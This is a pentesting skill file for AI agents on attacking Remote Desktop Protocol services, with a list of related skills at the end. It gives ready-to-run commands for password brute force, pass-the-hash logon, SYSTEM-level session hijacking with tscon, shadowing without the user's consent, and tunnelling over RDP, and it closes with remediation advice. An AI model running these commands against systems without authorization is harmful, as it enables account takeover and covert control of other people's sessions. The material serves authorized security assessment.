pentesting-rdp

$npx mdskill add xalgord/xalgorix/pentesting-rdp

- During authorized assessments when TCP 3389 (ms-wbt-server) is open - When fingerprinting the security layer (native RDP, TLS, CredSSP/NLA) and whether NLA is enforced - When validating recovered credentials or NT hashes against RDP - When you already hold a foothold and want to hijack or shadow an active session - When assessing for BlueKeep (CVE-2019-0708) or MS12-020 on legacy hosts

SKILL.md

.github/skills/pentesting-rdpView on GitHub ↗
---
name: pentesting-rdp
description: Testing the Remote Desktop Protocol (RDP, 3389/tcp ms-wbt-server) during authorized engagements. Covers
  encryption/NLA fingerprinting and NTLM info with nmap NSE, credential validation and pre/post-auth screenshots with
  netexec, password brute force (mindful of lockout), pass-the-hash logon with xfreerdp, session hijacking via tscon,
  RDS shadowing, RDP tunneling, and BlueKeep (CVE-2019-0708) / MS12-020 awareness.
domain: cybersecurity
subdomain: network-services-pentesting
tags:
- penetration-testing
- network-services
- rdp
- windows
- lateral-movement
- session-hijacking
version: '1.0'
author: xalgorix
license: Apache-2.0
---

# Pentesting RDP (port 3389)

## When to Use

- During authorized assessments when TCP 3389 (ms-wbt-server) is open
- When fingerprinting the security layer (native RDP, TLS, CredSSP/NLA) and whether NLA is enforced
- When validating recovered credentials or NT hashes against RDP
- When you already hold a foothold and want to hijack or shadow an active session
- When assessing for BlueKeep (CVE-2019-0708) or MS12-020 on legacy hosts

## Quick Enumeration

```bash
# Encryption, DoS (MS12-020 safe check), and NTLM Windows info
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>

# Security layer / NLA fingerprint
nmap --script rdp-enum-encryption -p 3389 <IP>

# netexec quick auth check (reports if NLA is required)
nxc rdp <IP> -u <user> -p <password>

# Pre-auth screenshot (only if NLA is disabled)
nxc rdp <IP> --nla-screenshot
```

## Critical: Checks Most Often Missed

1. **NLA disabled → pre-auth screenshot** — when Network Level Authentication is off, you can grab a login-screen screenshot pre-auth (`nxc rdp <IP> --nla-screenshot`), revealing logged-in usernames and host context.
2. **BlueKeep (CVE-2019-0708)** — pre-auth wormable RCE on legacy Windows (7/2008 R2 and older) with NLA off. Treat as critical; only exploit with explicit written authorization (the exploit can crash/BSOD the host).
3. **MS12-020** — RDP DoS / RCE on older hosts. The nmap script checks for it without triggering the DoS.
4. **Session hijacking via tscon** — with SYSTEM, you can attach to any user's existing RDP session without their password (`tscon <ID> /dest:<SESSIONNAME>`).
5. **RDS shadowing** — if shadowing policy allows, view/control another user's session, sometimes without consent (`mstsc /shadow:<ID> /noconsentprompt /control`).
6. **Weak / reused local admin creds + Restricted Admin** — pass-the-hash logon via `xfreerdp /pth:` when Restricted Admin mode is enabled.

How to CONFIRM: NLA status is confirmed by `nmap --script rdp-enum-encryption` and `nxc rdp` output. A valid credential is confirmed when `nxc rdp <IP> -u u -p p` shows `(+)`/`Pwn3d!`. BlueKeep candidacy is indicated by legacy OS + NLA off; confirm only via an authorized, non-destructive checker.

## Workflow

### Step 1: Enumerate (security layer, NLA, NTLM info)

```bash
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>
# rdp-ntlm-info leaks: target name, NetBIOS/DNS computer & domain name, OS build
nxc rdp <IP>                                            # banner + NLA requirement
```

### Step 2: Authenticate (validate creds, brute force, PtH)

```bash
# Validate a single credential / hash
nxc rdp <IP> -u <user> -p <password>
nxc rdp <IP> -u <user> -H <NTHASH>
rdp_check.py <domain>/<user>:<password>@<IP>            # impacket credential check

# Brute force — WARNING: can lock accounts; coordinate with the client
crowbar -b rdp -s <IP>/32 -U users.txt -c 'Password123'
hydra -L usernames.txt -p 'Password123' <IP> rdp

# Interactive logon
xfreerdp /u:<user> /p:<password> /v:<IP> [/d:domain]
xfreerdp /u:<user> /pth:<hash> /v:<IP> [/d:domain]      # pass-the-hash (Restricted Admin)
rdesktop -d <domain> -u <user> -p <password> <IP>
```

### Step 3: Post-auth screenshot / verify access

```bash
# Authenticated screenshot after valid login
nxc rdp <IP> -u <user> -p <password> --screenshot

# Add yourself to the RDP group if you have admin (post-exploitation)
net localgroup "Remote Desktop Users" <user> /add
```

### Step 4: Post-access / lateral movement (hijack, shadow, tunnel)

```bash
# Session hijacking with SYSTEM (no password needed)
query user                                              # list sessions + IDs
tscon <ID> /dest:<SESSIONNAME>                          # take over a session
# mimikatz alternative:
#   ts::sessions ; ts::remote /id:2

# RDS shadowing (view/control another session)
qwinsta /server:<IP>
mstsc /v:<IP> /shadow:<SESSION_ID> /control
mstsc /v:<IP> /shadow:<SESSION_ID> /noconsentprompt /prompt   # if policy allows
reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v Shadow

# Pivot/tunnel TCP over an RDP virtual channel (rdp2tcp)
xfreerdp /u:<user> /v:<IP> /rdp2tcp:/path/to/rdp2tcp/client/rdp2tcp

# Command exec without GUI / automation
# EvilRDP, SharpRDP — run shell/PowerShell, SOCKS proxy, clipboard, file transfer
```

## Key Concepts

| Concept | Description |
|---------|-------------|
| **RDP** | Microsoft's graphical remote desktop protocol on TCP 3389 |
| **NLA (CredSSP)** | Network Level Authentication; requires auth before a session is created |
| **Security layer** | Negotiated as native RDP, TLS, or CredSSP/NLA |
| **Restricted Admin mode** | Allows pass-the-hash RDP logon without sending a cleartext password |
| **Session hijacking (tscon)** | Attaching to another user's session as SYSTEM without their password |
| **RDS shadowing** | Viewing/controlling another user's active session via mstsc |
| **BlueKeep (CVE-2019-0708)** | Pre-auth wormable RCE in legacy RDP |
| **MS12-020** | RDP vulnerability allowing DoS / potential RCE on older hosts |

## Tools & Systems

| Tool | Purpose |
|------|---------|
| **nmap** (rdp-* NSE) | Encryption, NLA, NTLM info, MS12-020 check |
| **netexec / crackmapexec** (rdp) | Credential check, NLA detection, pre/post-auth screenshots |
| **xfreerdp / rdesktop** | Interactive logon, pass-the-hash, rdp2tcp tunneling |
| **impacket rdp_check.py** | Validate credentials against RDP |
| **crowbar / hydra** | RDP brute force (lockout-aware) |
| **mstsc / tscon / qwinsta** | Native session listing, hijacking, shadowing |
| **EvilRDP / SharpRDP** | Automated command execution and clipboard/file abuse over RDP |

## Common Scenarios

### Scenario 1: NLA Disabled Recon
`nxc rdp <IP> --nla-screenshot` captures the login screen pre-auth, revealing the logged-in user and domain, which informs targeted credential attacks.

### Scenario 2: Pass-the-Hash Logon
A recovered local admin NT hash works with `xfreerdp /pth:` because Restricted Admin mode is enabled, granting an interactive desktop without cracking the password.

### Scenario 3: Session Hijacking
After gaining SYSTEM on a jump host, `query user` shows a Domain Admin's disconnected session; `tscon <ID> /dest:rdp-tcp#0` takes it over, inheriting their privileges.

### Scenario 4: BlueKeep Exposure
`rdp-ntlm-info` shows Windows 2008 R2 with NLA off. The host is flagged as a critical BlueKeep candidate and reported; exploitation proceeds only with written authorization on a maintenance window.

## Output Format

```
## RDP Finding

**Service**: Remote Desktop Protocol
**Severity**: <Critical|High|Medium>
**Host**: <IP>:3389
**NLA**: <enabled|disabled>   **OS**: <from rdp-ntlm-info>

### Summary
<What was found: weak creds, NLA off, BlueKeep candidate, session hijack, shadowing>

### Evidence
- Command: <nmap / nxc / xfreerdp>
- Output: <NLA status, (+)/Pwn3d!, screenshot path, vuln verdict>

### Access Obtained
| Method | Result |
|--------|--------|
| xfreerdp PtH | interactive desktop as <user> |
| tscon hijack | inherited <DomainAdmin> session |

### Recommendation
1. Require Network Level Authentication (NLA) on all RDP hosts
2. Patch BlueKeep (CVE-2019-0708) and MS12-020; decommission legacy OS
3. Restrict RDP to VPN/jump hosts and enforce MFA
4. Disable RDS shadowing without consent; audit shadow policy
5. Enforce strong, unique credentials and account lockout thresholds
```

More from xalgord/xalgorix

SkillDescription
abusing-hop-by-hop-headersTesting proxies, load balancers, and CDNs for improper handling of HTTP hop-by-hop headers, where an
analyzing-macos-persistence-and-autostartEnumerating, planting, and hunting macOS persistence and auto-start (ASEP) locations during authorized
api-discoveryAPI endpoint discovery including OpenAPI/Swagger detection, hidden versioning, REST/GraphQL enumeration, and content negotiation
bypassing-binary-exploitation-mitigationsMethodology for identifying and defeating common binary hardening mitigations during authorized exploitation —
bypassing-captcha-protectionsIdentifying weaknesses in CAPTCHA implementations and bypassing them via replay, field removal,
bypassing-macos-gatekeeper-tcc-and-sipAssessing and bypassing macOS userland and platform security controls during authorized engagements -
bypassing-restricted-shellsEscaping restricted shells (rbash, rksh, lshell), chroot jails, and language sandboxes (Lua, Python)
bypassing-two-factor-and-otpIdentifying and exploiting flaws in two-factor authentication and one-time password verification
deepExhaustive security assessment with maximum coverage, depth, and vulnerability chaining
exploiting-ai-model-file-rceTesting machine-learning model files and model-loading services for remote code execution caused by insecure